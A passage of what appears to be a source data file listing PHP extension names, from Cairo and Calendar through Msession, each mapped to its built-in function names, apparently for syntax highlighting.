'cairo_ps_level_to_string',
'cairo_ps_surface_create',
'cairo_ps_surface_dsc_begin_page_setup',
'cairo_ps_surface_dsc_begin_setup',
'cairo_ps_surface_dsc_comment',
'cairo_ps_surface_get_eps',
'cairo_ps_surface_restrict_to_level',
'cairo_ps_surface_set_eps',
'cairo_ps_surface_set_size',
'cairo_scaled_font_create',
'cairo_scaled_font_extents',
'cairo_scaled_font_get_ctm',
'cairo_scaled_font_get_font_face',
'cairo_scaled_font_get_font_matrix',
'cairo_scaled_font_get_font_options',
'cairo_scaled_font_get_scale_matrix',
'cairo_scaled_font_get_type',
'cairo_scaled_font_glyph_extents',
'cairo_scaled_font_status',
'cairo_scaled_font_text_extents',
'cairo_surface_copy_page',
'cairo_surface_create_similar',
'cairo_surface_finish',
'cairo_surface_flush',
'cairo_surface_get_content',
'cairo_surface_get_device_offset',
'cairo_surface_get_font_options',
'cairo_surface_get_type',
'cairo_surface_mark_dirty_rectangle',
'cairo_surface_mark_dirty',
'cairo_surface_set_device_offset',
'cairo_surface_set_fallback_resolution',
'cairo_surface_show_page',
'cairo_surface_status',
'cairo_surface_write_to_png',
'cairo_svg_surface_create',
'cairo_svg_surface_restrict_to_version',
'cairo_svg_version_to_string'],
'Calendar': ['cal_days_in_month',
'cal_from_jd',
'cal_info',
'cal_to_jd',
'easter_date',
'easter_days',
'FrenchToJD',
'GregorianToJD',
'JDDayOfWeek',
'JDMonthName',
'JDToFrench',
'JDToGregorian',
'jdtojewish',
'JDToJulian',
'jdtounix',
'JewishToJD',
'JulianToJD',
'unixtojd'],
'Classes/Object': ['call_user_method_array',
'call_user_method',
'class_alias',
'class_exists',
'get_called_class',
'get_class_methods',
'get_class_vars',
'get_class',
'get_declared_classes',
'get_declared_interfaces',
'get_object_vars',
'get_parent_class',
'interface_exists',
'is_a',
'is_subclass_of',
'method_exists',
'property_exists'],
'Classkit': ['classkit_import',
'classkit_method_add',
'classkit_method_copy',
'classkit_method_redefine',
'classkit_method_remove',
'classkit_method_rename'],
'Crack': ['crack_check',
'crack_closedict',
'crack_getlastmessage',
'crack_opendict'],
'Ctype': ['ctype_alnum',
'ctype_alpha',
'ctype_cntrl',
'ctype_digit',
'ctype_graph',
'ctype_lower',
'ctype_print',
'ctype_punct'],
'Cyrus': ['cyrus_authenticate',
'cyrus_bind',
'cyrus_close',
'cyrus_connect',
'cyrus_query',
'cyrus_unbind'],
'DB++': ['dbplus_add',
'dbplus_aql',
'dbplus_chdir',
'dbplus_close',
'dbplus_curr',
'dbplus_errcode',
'dbplus_errno',
'dbplus_find',
'dbplus_first',
'dbplus_flush',
'dbplus_freealllocks',
'dbplus_freelock',
'dbplus_freerlocks',
'dbplus_getlock',
'dbplus_getunique',
'dbplus_info',
'dbplus_last',
'dbplus_lockrel',
'dbplus_next',
'dbplus_open',
'dbplus_prev',
'dbplus_rchperm',
'dbplus_rcreate',
'dbplus_rcrtexact',
'dbplus_rcrtlike',
'dbplus_resolve',
'dbplus_restorepos',
'dbplus_rkeys',
'dbplus_ropen',
'dbplus_rquery',
'dbplus_rrename',
'dbplus_rsecindex',
'dbplus_runlink',
'dbplus_rzap',
'dbplus_savepos',
'dbplus_setindex',
'dbplus_setindexbynumber',
'dbplus_sql',
'dbplus_tcl',
'dbplus_tremove',
'dbplus_undo',
'dbplus_undoprepare',
'dbplus_unlockrel',
'dbplus_unselect',
'dbplus_update',
'dbplus_xlockrel',
'dbplus_xunlockrel'],
'DBA': ['dba_close',
'dba_delete',
'dba_exists',
'dba_fetch',
'dba_firstkey',
'dba_handlers',
'dba_insert',
'dba_key_split',
'dba_list',
'dba_nextkey',
'dba_open',
'dba_optimize',
'dba_popen',
'dba_replace',
'dba_sync'],
'DOM': ['dom_import_simplexml'],
'DOM XML (PHP 4)': ['domxml_new_doc',
'domxml_open_file',
'domxml_open_mem',
'domxml_version',
'domxml_xmltree',
'domxml_xslt_stylesheet_doc',
'domxml_xslt_stylesheet_file',
'domxml_xslt_stylesheet',
'domxml_xslt_version',
'xpath_eval_expression',
'xpath_eval',
'xpath_new_context',
'xpath_register_ns_auto',
'xpath_register_ns',
'xptr_eval',
'xptr_new_context'],
'Date/Time': ['checkdate',
'date_add',
'date_create_from_format',
'date_create',
'date_date_set',
'date_default_timezone_get',
'date_default_timezone_set',
'date_diff',
'date_format',
'date_get_last_errors',
'date_interval_create_from_date_string',
'date_interval_format',
'date_isodate_set',
'date_modify',
'date_offset_get',
'date_parse_from_format',
'date_parse',
'date_sub',
'date_sun_info',
'date_sunrise',
'date_sunset',
'date_time_set',
'date_timestamp_get',
'date_timestamp_set',
'date_timezone_get',
'date_timezone_set',
'date',
'getdate',
'gettimeofday',
'gmdate',
'gmmktime',
'gmstrftime',
'idate',
'localtime',
'microtime',
'mktime',
'strftime',
'strptime',
'strtotime',
'time',
'timezone_abbreviations_list',
'timezone_identifiers_list',
'timezone_location_get',
'timezone_name_from_abbr',
'timezone_name_get',
'timezone_offset_get',
'timezone_open',
'timezone_transitions_get',
'timezone_version_get'],
'Direct IO': ['dio_close', 'dio_fcntl', 'dio_open'],
'Directory': ['chdir',
'chroot',
'closedir',
'getcwd',
'opendir',
'readdir',
'rewinddir',
'scandir'],
'Enchant': ['enchant_broker_describe',
'enchant_broker_dict_exists',
'enchant_broker_free_dict',
'enchant_broker_free',
'enchant_broker_get_error',
'enchant_broker_init',
'enchant_broker_list_dicts',
'enchant_broker_request_dict',
'enchant_broker_request_pwl_dict',
'enchant_broker_set_ordering',
'enchant_dict_add_to_personal',
'enchant_dict_add_to_session',
'enchant_dict_check',
'enchant_dict_describe',
'enchant_dict_get_error',
'enchant_dict_is_in_session',
'enchant_dict_quick_check',
'enchant_dict_store_replacement',
'enchant_dict_suggest'],
'Error Handling': ['debug_backtrace',
'debug_print_backtrace',
'error_get_last',
'error_log',
'error_reporting',
'restore_error_handler',
'restore_exception_handler',
'set_error_handler',
'set_exception_handler',
'trigger_error',
'user_error'],
'Exif': ['exif_imagetype',
'exif_read_data',
'exif_tagname',
'exif_thumbnail',
'read_exif_data'],
'Expect': ['expect_expectl'],
'FAM': ['fam_cancel_monitor',
'fam_close',
'fam_monitor_collection',
'fam_monitor_directory',
'fam_monitor_file',
'fam_next_event',
'fam_open',
'fam_pending',
'fam_resume_monitor',
'fam_suspend_monitor'],
'FDF': ['fdf_add_doc_javascript',
'fdf_add_template',
'fdf_close',
'fdf_create',
'fdf_enum_values',
'fdf_errno',
'fdf_error',
'fdf_get_ap',
'fdf_get_attachment',
'fdf_get_encoding',
'fdf_get_file',
'fdf_get_flags',
'fdf_get_opt',
'fdf_get_status',
'fdf_get_value',
'fdf_get_version',
'fdf_header',
'fdf_next_field_name',
'fdf_open_string',
'fdf_open',
'fdf_remove_item',
'fdf_save_string',
'fdf_save',
'fdf_set_ap',
'fdf_set_encoding',
'fdf_set_file',
'fdf_set_flags',
'fdf_set_javascript_action',
'fdf_set_on_import_javascript',
'fdf_set_opt',
'fdf_set_status',
'fdf_set_submit_form_action',
'fdf_set_target_frame',
'fdf_set_value',
'fdf_set_version'],
'FTP': ['ftp_alloc',
'ftp_cdup',
'ftp_chdir',
'ftp_chmod',
'ftp_close',
'ftp_connect',
'ftp_delete',
'ftp_exec',
'ftp_fget',
'ftp_fput',
'ftp_get_option',
'ftp_get',
'ftp_login',
'ftp_mdtm',
'ftp_mkdir',
'ftp_nb_continue',
'ftp_nb_fget',
'ftp_nb_fput',
'ftp_nb_get',
'ftp_nb_put',
'ftp_nlist',
'ftp_pasv',
'ftp_put',
'ftp_pwd',
'ftp_quit',
'ftp_raw',
'ftp_rawlist',
'ftp_rename',
'ftp_rmdir',
'ftp_set_option',
'ftp_site',
'ftp_size',
'ftp_ssl_connect',
'ftp_systype'],
'Fileinfo': ['finfo_buffer',
'finfo_close',
'finfo_file',
'finfo_open',
'finfo_set_flags',
'mime_content_type'],
'Filesystem': ['basename',
'chgrp',
'chmod',
'chown',
'clearstatcache',
'copy',
'dirname',
'disk_free_space',
'disk_total_space',
'diskfreespace',
'fclose',
'feof',
'fflush',
'fgetc',
'fgetcsv',
'fgets',
'fgetss',
'file_exists',
'file_get_contents',
'file_put_contents',
'file',
'fileatime',
'filectime',
'filegroup',
'fileinode',
'filemtime',
'fileowner',
'fileperms',
'filesize',
'filetype',
'flock',
'fnmatch',
'fopen',
'fpassthru',
'fputcsv',
'fputs',
'fread',
'fscanf',
'fseek',
'fstat',
'ftell',
'ftruncate',
'fwrite',
'glob',
'is_dir',
'is_executable',
'is_file',
'is_link',
'is_readable',
'is_uploaded_file',
'is_writable',
'is_writeable',
'lchgrp',
'lchown',
'link',
'linkinfo',
'lstat',
'mkdir',
'move_uploaded_file',
'parse_ini_file',
'parse_ini_string',
'pathinfo',
'pclose',
'popen',
'readfile',
'readlink',
'realpath_cache_get',
'realpath_cache_size',
'realpath',
'rename',
'rewind',
'rmdir',
'set_file_buffer',
'stat',
'symlink',
'tempnam',
'tmpfile',
'touch',
'umask',
'unlink'],
'Filter': ['filter_has_var',
'filter_id',
'filter_input_array',
'filter_input',
'filter_list',
'filter_var_array',
'filter_var'],
'Firebird/InterBase': ['ibase_add_user',
'ibase_affected_rows',
'ibase_backup',
'ibase_blob_add',
'ibase_blob_cancel',
'ibase_blob_close',
'ibase_blob_create',
'ibase_blob_echo',
'ibase_blob_get',
'ibase_blob_import',
'ibase_blob_info',
'ibase_blob_open',
'ibase_close',
'ibase_commit_ret',
'ibase_commit',
'ibase_connect',
'ibase_db_info',
'ibase_delete_user',
'ibase_drop_db',
'ibase_errcode',
'ibase_errmsg',
'ibase_execute',
'ibase_fetch_assoc',
'ibase_fetch_object',
'ibase_fetch_row',
'ibase_field_info',
'ibase_free_event_handler',
'ibase_free_query',
'ibase_free_result',
'ibase_gen_id',
'ibase_maintain_db',
'ibase_modify_user',
'ibase_name_result',
'ibase_num_fields',
'ibase_num_params',
'ibase_param_info',
'ibase_pconnect',
'ibase_prepare',
'ibase_query',
'ibase_restore',
'ibase_rollback_ret',
'ibase_rollback',
'ibase_server_info',
'ibase_service_attach',
'ibase_service_detach',
'ibase_set_event_handler',
'ibase_timefmt',
'ibase_trans',
'ibase_wait_event'],
'FriBiDi': ['fribidi_log2vis'],
'FrontBase': ['fbsql_affected_rows',
'fbsql_autocommit',
'fbsql_blob_size',
'fbsql_change_user',
'fbsql_clob_size',
'fbsql_close',
'fbsql_commit',
'fbsql_connect',
'fbsql_create_blob',
'fbsql_create_clob',
'fbsql_create_db',
'fbsql_data_seek',
'fbsql_database_password',
'fbsql_database',
'fbsql_db_query',
'fbsql_db_status',
'fbsql_drop_db',
'fbsql_errno',
'fbsql_error',
'fbsql_fetch_array',
'fbsql_fetch_assoc',
'fbsql_fetch_field',
'fbsql_fetch_lengths',
'fbsql_fetch_object',
'fbsql_fetch_row',
'fbsql_field_flags',
'fbsql_field_len',
'fbsql_field_name',
'fbsql_field_seek',
'fbsql_field_table',
'fbsql_field_type',
'fbsql_free_result',
'fbsql_get_autostart_info',
'fbsql_hostname',
'fbsql_insert_id',
'fbsql_list_dbs',
'fbsql_list_fields',
'fbsql_list_tables',
'fbsql_next_result',
'fbsql_num_fields',
'fbsql_num_rows',
'fbsql_password',
'fbsql_pconnect',
'fbsql_query',
'fbsql_read_blob',
'fbsql_read_clob',
'fbsql_result',
'fbsql_rollback',
'fbsql_rows_fetched',
'fbsql_select_db',
'fbsql_set_characterset',
'fbsql_set_lob_mode',
'fbsql_set_password',
'fbsql_set_transaction',
'fbsql_start_db',
'fbsql_stop_db',
'fbsql_table_name',
'fbsql_tablename',
'fbsql_username',
'fbsql_warnings'],
'Function handling': ['call_user_func_array',
'call_user_func',
'create_function',
'forward_static_call_array',
'forward_static_call',
'func_get_arg',
'func_get_args',
'func_num_args',
'function_exists',
'get_defined_functions',
'register_shutdown_function',
'register_tick_function',
'unregister_tick_function'],
'GD and Image': ['gd_info',
'getimagesize',
'image_type_to_extension',
'image_type_to_mime_type'],
'GMP': ['gmp_abs',
'gmp_add',
'gmp_and',
'gmp_clrbit',
'gmp_cmp',
'gmp_com',
'gmp_div_q',
'gmp_div_qr',
'gmp_div_r',
'gmp_div',
'gmp_divexact',
'gmp_fact',
'gmp_gcd',
'gmp_gcdext',
'gmp_hamdist',
'gmp_init',
'gmp_intval',
'gmp_invert',
'gmp_jacobi',
'gmp_legendre',
'gmp_mod',
'gmp_mul',
'gmp_neg',
'gmp_nextprime',
'gmp_or',
'gmp_perfect_square',
'gmp_popcount',
'gmp_pow',
'gmp_powm',
'gmp_prob_prime',
'gmp_random',
'gmp_scan0',
'gmp_scan1',
'gmp_setbit',
'gmp_sign',
'gmp_sqrt',
'gmp_sqrtrem',
'gmp_strval',
'gmp_sub',
'gmp_testbit',
'gmp_xor'],
'GeoIP': ['geoip_continent_code_by_name',
'geoip_country_code_by_name',
'geoip_country_code3_by_name',
'geoip_country_name_by_name',
'geoip_database_info',
'geoip_db_avail',
'geoip_db_filename',
'geoip_db_get_all_info',
'geoip_id_by_name',
'geoip_isp_by_name',
'geoip_org_by_name',
'geoip_record_by_name',
'geoip_region_by_name',
'geoip_region_name_by_code',
'geoip_time_zone_by_country_and_region'],
'Gettext': ['bind_textdomain_codeset',
'bindtextdomain',
'dcgettext',
'dcngettext',
'dgettext',
'dngettext',
'gettext',
'ngettext',
'textdomain'],
'GnuPG': ['gnupg_adddecryptkey',
'gnupg_addencryptkey',
'gnupg_addsignkey',
'gnupg_cleardecryptkeys',
'gnupg_clearencryptkeys',
'gnupg_clearsignkeys',
'gnupg_decrypt',
'gnupg_decryptverify',
'gnupg_encrypt',
'gnupg_encryptsign',
'gnupg_export',
'gnupg_geterror',
'gnupg_getprotocol',
'gnupg_import',
'gnupg_init',
'gnupg_keyinfo',
'gnupg_setarmor',
'gnupg_seterrormode',
'gnupg_setsignmode',
'gnupg_sign',
'gnupg_verify'],
'Gopher': ['gopher_parsedir'],
'Grapheme': ['grapheme_extract',
'grapheme_stripos',
'grapheme_stristr',
'grapheme_strlen',
'grapheme_strpos',
'grapheme_strripos',
'grapheme_strrpos',
'grapheme_strstr',
'grapheme_substr'],
'Gupnp': ['gupnp_context_get_host_ip',
'gupnp_context_get_port',
'gupnp_context_get_subscription_timeout',
'gupnp_context_host_path',
'gupnp_context_new',
'gupnp_context_set_subscription_timeout',
'gupnp_context_timeout_add',
'gupnp_context_unhost_path',
'gupnp_control_point_browse_start',
'gupnp_control_point_browse_stop',
'gupnp_control_point_callback_set',
'gupnp_control_point_new',
'gupnp_device_action_callback_set',
'gupnp_device_info_get_service',
'gupnp_device_info_get',
'gupnp_root_device_get_available',
'gupnp_root_device_get_relative_location',
'gupnp_root_device_new',
'gupnp_root_device_set_available',
'gupnp_root_device_start',
'gupnp_root_device_stop',
'gupnp_service_action_get',
'gupnp_service_action_return_error',
'gupnp_service_action_return',
'gupnp_service_action_set',
'gupnp_service_freeze_notify',
'gupnp_service_info_get_introspection',
'gupnp_service_info_get',
'gupnp_service_introspection_get_state_variable',
'gupnp_service_notify',
'gupnp_service_proxy_action_get',
'gupnp_service_proxy_action_set',
'gupnp_service_proxy_add_notify',
'gupnp_service_proxy_callback_set',
'gupnp_service_proxy_get_subscribed',
'gupnp_service_proxy_remove_notify',
'gupnp_service_proxy_set_subscribed',
'gupnp_service_thaw_notify'],
'HTTP': ['http_cache_etag',
'http_cache_last_modified',
'http_chunked_decode',
'http_deflate',
'http_inflate',
'http_build_cookie',
'http_date',
'http_get_request_body_stream',
'http_get_request_body',
'http_get_request_headers',
'http_match_etag',
'http_match_modified',
'http_match_request_header',
'http_support',
'http_negotiate_charset',
'http_negotiate_content_type',
'http_negotiate_language',
'ob_deflatehandler',
'ob_etaghandler',
'ob_inflatehandler',
'http_parse_cookie',
'http_parse_headers',
'http_parse_message',
'http_parse_params',
'http_persistent_handles_clean',
'http_persistent_handles_count',
'http_persistent_handles_ident',
'http_get',
'http_head',
'http_post_data',
'http_post_fields',
'http_put_data',
'http_put_file',
'http_put_stream',
'http_request_body_encode',
'http_request_method_exists',
'http_request_method_name',
'http_request_method_register',
'http_request_method_unregister',
'http_request',
'http_redirect',
'http_send_content_disposition',
'http_send_content_type',
'http_send_data',
'http_send_file',
'http_send_last_modified',
'http_send_status',
'http_send_stream',
'http_throttle',
'http_build_str',
'http_build_url'],
'Hash': ['hash_algos',
'hash_copy',
'hash_file',
'hash_final',
'hash_hmac_file',
'hash_hmac',
'hash_init',
'hash_update_file',
'hash_update_stream',
'hash_update',
'hash'],
'Hyperwave': ['hw_Array2Objrec',
'hw_changeobject',
'hw_Children',
'hw_ChildrenObj',
'hw_Close',
'hw_Connect',
'hw_connection_info',
'hw_cp',
'hw_Deleteobject',
'hw_DocByAnchor',
'hw_DocByAnchorObj',
'hw_Document_Attributes',
'hw_Document_BodyTag',
'hw_Document_Content',
'hw_Document_SetContent',
'hw_Document_Size',
'hw_dummy',
'hw_EditText',
'hw_Error',
'hw_ErrorMsg',
'hw_Free_Document',
'hw_GetAnchors',
'hw_GetAnchorsObj',
'hw_GetAndLock',
'hw_GetChildColl',
'hw_GetChildCollObj',
'hw_GetChildDocColl',
'hw_GetChildDocCollObj',
'hw_GetObject',
'hw_GetObjectByQuery',
'hw_GetObjectByQueryColl',
'hw_GetObjectByQueryCollObj',
'hw_GetObjectByQueryObj',
'hw_GetParents',
'hw_GetParentsObj',
'hw_getrellink',
'hw_GetRemote',
'hw_getremotechildren',
'hw_GetSrcByDestObj',
'hw_GetText',
'hw_getusername',
'hw_Identify',
'hw_InCollections',
'hw_Info',
'hw_InsColl',
'hw_InsDoc',
'hw_insertanchors',
'hw_InsertDocument',
'hw_InsertObject',
'hw_mapid',
'hw_Modifyobject',
'hw_mv',
'hw_New_Document',
'hw_objrec2array',
'hw_Output_Document',
'hw_pConnect',
'hw_PipeDocument',
'hw_Root',
'hw_setlinkroot',
'hw_stat',
'hw_Unlock',
'hw_Who'],
'Hyperwave API': ['hw_api_attribute',
'hwapi_hgcsp',
'hw_api_content',
'hw_api_object'],
'IBM DB2': ['db2_autocommit',
'db2_bind_param',
'db2_client_info',
'db2_close',
'db2_column_privileges',
'db2_columns',
'db2_commit',
'db2_conn_error',
'db2_conn_errormsg',
'db2_connect',
'db2_cursor_type',
'db2_escape_string',
'db2_exec',
'db2_execute',
'db2_fetch_array',
'db2_fetch_assoc',
'db2_fetch_both',
'db2_fetch_object',
'db2_fetch_row',
'db2_field_display_size',
'db2_field_name',
'db2_field_num',
'db2_field_precision',
'db2_field_scale',
'db2_field_type',
'db2_field_width',
'db2_foreign_keys',
'db2_free_result',
'db2_free_stmt',
'db2_get_option',
'db2_last_insert_id'],
'ID3': ['id3_get_frame_long_name',
'id3_get_frame_short_name',
'id3_get_genre_id',
'id3_get_genre_list',
'id3_get_genre_name',
'id3_get_tag',
'id3_get_version',
'id3_remove_tag',
'id3_set_tag'],
'IDN': ['idn_to_ascii', 'idn_to_unicode', 'idn_to_utf8'],
'IIS': ['iis_add_server',
'iis_get_dir_security',
'iis_get_script_map',
'iis_get_server_by_comment',
'iis_get_server_by_path',
'iis_get_server_rights',
'iis_get_service_state',
'iis_remove_server',
'iis_set_app_settings',
'iis_set_dir_security',
'iis_set_script_map',
'iis_set_server_rights',
'iis_start_server',
'iis_start_service',
'iis_stop_server',
'iis_stop_service'],
'IMAP': ['imap_8bit',
'imap_alerts',
'imap_append',
'imap_base64',
'imap_binary',
'imap_body',
'imap_bodystruct',
'imap_check',
'imap_clearflag_full',
'imap_close',
'imap_createmailbox',
'imap_delete',
'imap_deletemailbox',
'imap_errors',
'imap_expunge',
'imap_fetch_overview',
'imap_fetchbody',
'imap_fetchheader',
'imap_fetchmime',
'imap_fetchstructure',
'imap_gc',
'imap_get_quota',
'imap_get_quotaroot',
'imap_getacl',
'imap_getmailboxes',
'imap_getsubscribed',
'imap_header',
'imap_headerinfo',
'imap_headers',
'imap_last_error',
'imap_list',
'imap_listmailbox',
'imap_listscan',
'imap_listsubscribed',
'imap_lsub',
'imap_mail_compose',
'imap_mail_copy',
'imap_mail_move',
'imap_mail',
'imap_mailboxmsginfo',
'imap_mime_header_decode',
'imap_msgno',
'imap_num_msg',
'imap_num_recent',
'imap_open',
'imap_ping',
'imap_qprint',
'imap_renamemailbox',
'imap_reopen',
'imap_rfc822_parse_adrlist',
'imap_rfc822_parse_headers',
'imap_rfc822_write_address',
'imap_savebody',
'imap_scanmailbox',
'imap_search',
'imap_set_quota',
'imap_setacl',
'imap_setflag_full',
'imap_sort',
'imap_status',
'imap_subscribe',
'imap_thread',
'imap_timeout',
'imap_uid',
'imap_undelete',
'imap_unsubscribe',
'imap_utf7_decode',
'imap_utf7_encode',
'imap_utf8'],
'Informix': ['ifx_affected_rows',
'ifx_blobinfile_mode',
'ifx_byteasvarchar',
'ifx_close',
'ifx_connect',
'ifx_copy_blob',
'ifx_create_blob',
'ifx_create_char',
'ifx_do',
'ifx_error',
'ifx_errormsg',
'ifx_fetch_row',
'ifx_fieldproperties',
'ifx_fieldtypes',
'ifx_free_blob',
'ifx_free_char',
'ifx_free_result',
'ifx_get_blob',
'ifx_get_char',
'ifx_getsqlca',
'ifx_htmltbl_result',
'ifx_nullformat',
'ifx_num_fields',
'ifx_num_rows',
'ifx_pconnect',
'ifx_prepare',
'ifx_query',
'ifx_textasvarchar',
'ifx_update_blob',
'ifx_update_char',
'ifxus_close_slob',
'ifxus_create_slob',
'ifxus_free_slob',
'ifxus_open_slob',
'ifxus_read_slob',
'ifxus_seek_slob',
'ifxus_tell_slob',
'ifxus_write_slob'],
'Ingres': ['ingres_autocommit_state',
'ingres_autocommit',
'ingres_charset',
'ingres_close',
'ingres_commit',
'ingres_connect',
'ingres_cursor',
'ingres_errno',
'ingres_error',
'ingres_errsqlstate',
'ingres_escape_string',
'ingres_execute',
'ingres_fetch_array',
'ingres_fetch_assoc',
'ingres_fetch_object',
'ingres_fetch_proc_return',
'ingres_fetch_row',
'ingres_field_length',
'ingres_field_name',
'ingres_field_nullable',
'ingres_field_precision',
'ingres_field_scale',
'ingres_field_type',
'ingres_free_result',
'ingres_next_error',
'ingres_num_fields',
'ingres_num_rows',
'ingres_pconnect',
'ingres_prepare',
'ingres_query',
'ingres_result_seek',
'ingres_rollback',
'ingres_set_environment',
'ingres_unbuffered_query'],
'Inotify': ['inotify_add_watch',
'inotify_init',
'inotify_queue_len',
'inotify_read',
'inotify_rm_watch'],
'JSON': ['json_decode', 'json_encode', 'json_last_error'],
'Java': ['java_last_exception_clear', 'java_last_exception_get'],
'Judy': ['judy_type', 'judy_version'],
'KADM5': ['kadm5_chpass_principal',
'kadm5_create_principal',
'kadm5_delete_principal',
'kadm5_destroy',
'kadm5_flush',
'kadm5_get_policies',
'kadm5_get_principal',
'kadm5_get_principals',
'kadm5_init_with_password',
'kadm5_modify_principal'],
'LDAP': ['ldap_8859_to_t61',
'ldap_add',
'ldap_bind',
'ldap_close',
'ldap_compare',
'ldap_connect',
'ldap_count_entries',
'ldap_delete',
'ldap_dn2ufn',
'ldap_err2str',
'ldap_errno',
'ldap_error',
'ldap_explode_dn',
'ldap_first_attribute',
'ldap_first_entry',
'ldap_first_reference',
'ldap_free_result',
'ldap_get_attributes',
'ldap_get_dn',
'ldap_get_entries',
'ldap_get_option',
'ldap_get_values_len',
'ldap_get_values',
'ldap_list',
'ldap_mod_add',
'ldap_mod_del',
'ldap_mod_replace',
'ldap_modify',
'ldap_next_attribute',
'ldap_next_entry',
'ldap_next_reference',
'ldap_parse_reference',
'ldap_parse_result',
'ldap_read',
'ldap_rename',
'ldap_sasl_bind',
'ldap_search',
'ldap_set_option',
'ldap_set_rebind_proc',
'ldap_sort',
'ldap_start_tls',
'ldap_t61_to_8859',
'ldap_unbind'],
'LZF': ['lzf_compress', 'lzf_decompress', 'lzf_optimized_for'],
'Libevent': ['event_add',
'event_base_free',
'event_base_loop',
'event_base_loopbreak',
'event_base_loopexit',
'event_base_new',
'event_base_priority_init',
'event_base_set',
'event_buffer_base_set',
'event_buffer_disable',
'event_buffer_enable',
'event_buffer_fd_set',
'event_buffer_free',
'event_buffer_new',
'event_buffer_priority_set',
'event_buffer_read',
'event_buffer_set_callback',
'event_buffer_timeout_set',
'event_buffer_watermark_set',
'event_buffer_write',
'event_del',
'event_free',
'event_new',
'event_set'],
'Lotus Notes': ['notes_body',
'notes_copy_db',
'notes_create_db',
'notes_create_note',
'notes_drop_db',
'notes_find_note',
'notes_header_info',
'notes_list_msgs',
'notes_mark_read',
'notes_mark_unread',
'notes_nav_create',
'notes_search',
'notes_unread',
'notes_version'],
'MCVE': ['m_checkstatus',
'm_completeauthorizations',
'm_connect',
'm_connectionerror',
'm_deletetrans',
'm_destroyconn',
'm_destroyengine',
'm_getcell',
'm_getcellbynum',
'm_getcommadelimited',
'm_getheader',
'm_initconn',
'm_initengine',
'm_iscommadelimited',
'm_maxconntimeout',
'm_monitor',
'm_numcolumns',
'm_numrows',
'm_parsecommadelimited',
'm_responsekeys'],
'Mail': ['ezmlm_hash', 'mail'],
'Mailparse': ['mailparse_determine_best_xfer_encoding',
'mailparse_msg_create',
'mailparse_msg_extract_part_file',
'mailparse_msg_extract_part',
'mailparse_msg_extract_whole_part_file',
'mailparse_msg_free',
'mailparse_msg_get_part_data',
'mailparse_msg_get_part',
'mailparse_msg_get_structure',
'mailparse_msg_parse_file',
'mailparse_msg_parse',
'mailparse_rfc822_parse_addresses',
'mailparse_stream_encode',
'mailparse_uudecode_all'],
'Math': ['abs',
'acos',
'acosh',
'asin',
'asinh',
'atan2',
'atan',
'atanh',
'base_convert',
'bindec',
'ceil',
'cos',
'cosh',
'decbin',
'dechex',
'decoct',
'deg2rad',
'exp',
'expm1'],
'MaxDB': ['maxdb_affected_rows',
'maxdb_autocommit',
'maxdb_bind_param',
'maxdb_bind_result',
'maxdb_change_user',
'maxdb_character_set_name',
'maxdb_client_encoding',
'maxdb_close_long_data',
'maxdb_close',
'maxdb_commit',
'maxdb_connect_errno',
'maxdb_connect_error',
'maxdb_connect',
'maxdb_data_seek',
'maxdb_debug',
'maxdb_disable_reads_from_master',
'maxdb_disable_rpl_parse',
'maxdb_dump_debug_info',
'maxdb_embedded_connect',
'maxdb_enable_reads_from_master',
'maxdb_enable_rpl_parse',
'maxdb_errno',
'maxdb_error',
'maxdb_escape_string',
'maxdb_execute',
'maxdb_fetch_array',
'maxdb_fetch_assoc',
'maxdb_fetch_field_direct',
'maxdb_fetch_field',
'maxdb_fetch_fields',
'maxdb_fetch_lengths',
'maxdb_fetch_object',
'maxdb_fetch_row',
'maxdb_fetch',
'maxdb_field_count',
'maxdb_field_seek',
'maxdb_field_tell',
'maxdb_free_result',
'maxdb_get_client_info',
'maxdb_get_client_version',
'maxdb_get_host_info',
'maxdb_get_metadata',
'maxdb_get_proto_info',
'maxdb_get_server_info',
'maxdb_get_server_version',
'maxdb_info',
'maxdb_init',
'maxdb_insert_id',
'maxdb_kill',
'maxdb_master_query',
'maxdb_more_results',
'maxdb_multi_query',
'maxdb_next_result',
'maxdb_num_fields',
'maxdb_num_rows',
'maxdb_options',
'maxdb_param_count',
'maxdb_ping',
'maxdb_prepare',
'maxdb_query',
'maxdb_real_connect',
'maxdb_real_escape_string',
'maxdb_real_query',
'maxdb_report',
'maxdb_rollback',
'maxdb_rpl_parse_enabled',
'maxdb_rpl_probe',
'maxdb_rpl_query_type',
'maxdb_select_db',
'maxdb_send_long_data',
'maxdb_send_query',
'maxdb_server_end',
'maxdb_server_init',
'maxdb_set_opt',
'maxdb_sqlstate',
'maxdb_ssl_set',
'maxdb_stat',
'maxdb_stmt_affected_rows'],
'Mcrypt': ['mcrypt_cbc',
'mcrypt_cfb',
'mcrypt_create_iv',
'mcrypt_decrypt',
'mcrypt_ecb',
'mcrypt_enc_get_algorithms_name',
'mcrypt_enc_get_block_size',
'mcrypt_enc_get_iv_size',
'mcrypt_enc_get_key_size',
'mcrypt_enc_get_modes_name',
'mcrypt_enc_get_supported_key_sizes',
'mcrypt_enc_is_block_algorithm_mode',
'mcrypt_enc_is_block_algorithm',
'mcrypt_enc_is_block_mode',
'mcrypt_enc_self_test',
'mcrypt_encrypt',
'mcrypt_generic_deinit',
'mcrypt_generic_end',
'mcrypt_generic_init',
'mcrypt_generic',
'mcrypt_get_block_size',
'mcrypt_get_cipher_name',
'mcrypt_get_iv_size',
'mcrypt_get_key_size',
'mcrypt_list_algorithms',
'mcrypt_list_modes',
'mcrypt_module_close',
'mcrypt_module_get_algo_block_size',
'mcrypt_module_get_algo_key_size',
'mcrypt_module_get_supported_key_sizes',
'mcrypt_module_is_block_algorithm_mode',
'mcrypt_module_is_block_algorithm',
'mcrypt_module_is_block_mode',
'mcrypt_module_open',
'mcrypt_module_self_test',
'mcrypt_ofb',
'mdecrypt_generic'],
'Memcache': ['memcache_debug'],
'Mhash': ['mhash_count',
'mhash_get_block_size',
'mhash_get_hash_name',
'mhash_keygen_s2k',
'mhash'],
'Ming': ['ming_keypress',
'ming_setcubicthreshold',
'ming_setscale',
'ming_setswfcompression',
'ming_useconstants',
'ming_useswfversion'],
'Misc.': ['connection_aborted',
'connection_status',
'connection_timeout',
'constant',
'define',
'defined',
'die',
'eval',
'exit',
'get_browser',
'__halt_compiler',
'highlight_file',
'highlight_string',
'ignore_user_abort',
'pack',
'php_check_syntax',
'php_strip_whitespace',
'show_source',
'sleep',
'sys_getloadavg',
'time_nanosleep',
'time_sleep_until',
'uniqid',
'unpack',
'usleep'],
'Mongo': ['bson_decode', 'bson_encode'],
'Msession': ['msession_connect',
'msession_count',
'msession_create',
'msession_destroy',
'msession_disconnect',
'msession_find',
'msession_get_array',
'msession_get_data',
'msession_get',
'msession_inc',
'msession_list',
